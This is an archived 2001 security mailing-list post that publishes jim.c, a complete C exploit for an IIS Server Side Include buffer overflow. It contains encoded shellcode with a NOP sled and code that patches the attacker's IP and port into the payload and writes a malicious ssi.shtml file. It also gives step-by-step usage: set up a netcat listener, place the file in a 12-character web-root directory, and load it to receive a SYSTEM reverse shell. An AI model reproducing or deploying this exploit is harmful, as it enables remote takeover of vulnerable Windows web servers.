IIS Server Side Include Buffer overflow exploit code

From: Indigo (indig0at_private)
Date: Mon Nov 26 2001 - 21:26:45 PST

Next message: Klaxon: "Anonymiser.com might reveal your IP"

Previous message: Indigo: "Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) As this has been around for a while I thought I'd write some exploit code for it. Indigo. /* jim.c - IIS Server Side Include exploit by Indigo <indig0at_private> 2001 Usage: jim <attacker host> <attacker port> This code has been compiled and tested on Linux and Win32 To exploit this vulnerability you must have write access to the web root of the target web server. This program will generate a file called ssi.shtml. Create a directory in the web root whose name is 12 characters long (this is important!) eg. ssi_overflow then put this file into the new directory. Start up a netcat listener: nc -l -p <attacker port> -vv Access the file http://target/ssi_overflow/ssi.shtml using a web browser. N.B. I have had problems using Netscape to do this but IE works fine. A SYSTEM shell will appear in the Netcat session. You may need to hit return a few times to get the prompt up. Main shellcode adapted from jill.c by dark spyrit <dspyritat_private> Greets to: Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds */ #include <stdio.h> /* #include <windows.h> uncomment if compiling on Win32 */ int main(int argc, char *argv[]) { unsigned char shellcode[] = "\x3C\x21\x2D\x2D\x23\x69\x6E\x63\x6C\x75\x64\x65 \x20\x66\x69\x6C" "\x65\x3D\x22\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15 \x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95 \x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96 \xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14 \x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66 \x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6 \x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1 \x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96 \x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97 \x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95 \x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41 \xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95 \x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1 \xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5 \x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95 \x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5 \x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95 \x18\xd2\xe5\xc5\x18\xd2" "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95 \x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2 \x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2 \x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10 \x3e\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11 \x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2 \x91\x55\x3d\x97\x94" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2 \x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1 \xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95 \x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05 \x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05 \x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9 \x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41 \xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39 \x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0 \xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9 \xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0 \x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6 \xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0 \xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9 \xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1 \xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7 \xfa\xf6\xf0\xe6\xe6\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2 \xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5 \x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1 \x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3 \x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x33" "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33 \xdb\xb3\x24\x03\xc3\xff\xe0" "\xeb\xb9\x90\x90\x05\x31\x8c\x6a" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x66\x81 \xEC\xD0\x0E\xE9" "\xD2\xF7\xFF\xFF" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90" "\x8B\x94\xF8\x77\x10\xF3\xC7\xF3\xC7\x22 \x2D\x2D\x3E\x0D\x0A\x00"; FILE *fp; unsigned short int a_port; unsigned long a_host; printf ("\njim - IIS Server Side Include overflow launcher\nby Indigo <indig0at_private> 2001\n\n"); printf ("To exploit this vulnerability you must have write access\n"); printf ("to the web root of the target web server.\n\n"); printf ("This program will generate a file called ssi.shtml.\n"); printf ("Create a directory in the web root whose name is\n"); printf ("12 characters long eg. ssi_overflow then put this file\n"); printf ("into the new directory. Start up a netcat listener:\n\n"); printf ("nc -l -p <attacker port> -vv\n\n"); printf ("Access the file http://target/ssi_overflow/ssi.shtml\n"); printf ("using a web browser. A SYSTEM shell will appear.\n\n"); printf ("N.B. I have had problems using Netscape to do this but IE works fine.\n\n"); if (argc != 3) { printf ("Usage: %s <attacker host> <attacker port>\n", argv[0]); return (1); } a_port = htons(atoi(argv[2])); a_port^= 0x9595; a_host = inet_addr(argv[1]); a_host^=0x95959595; shellcode[417]= (a_port) & 0xff; shellcode[418]= (a_port >> 8) & 0xff; shellcode[422]= (a_host) & 0xff; shellcode[423]= (a_host >> 8) & 0xff; shellcode[424]= (a_host >> 16) & 0xff; shellcode[425]= (a_host >> 24) & 0xff; fp = fopen ("./ssi.shtml","wb"); fputs (shellcode,fp); fclose (fp); return 0; }

Next message: Klaxon: "Anonymiser.com might reveal your IP"
Previous message: Indigo: "Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Nov 27 2001 - 13:05:41 PST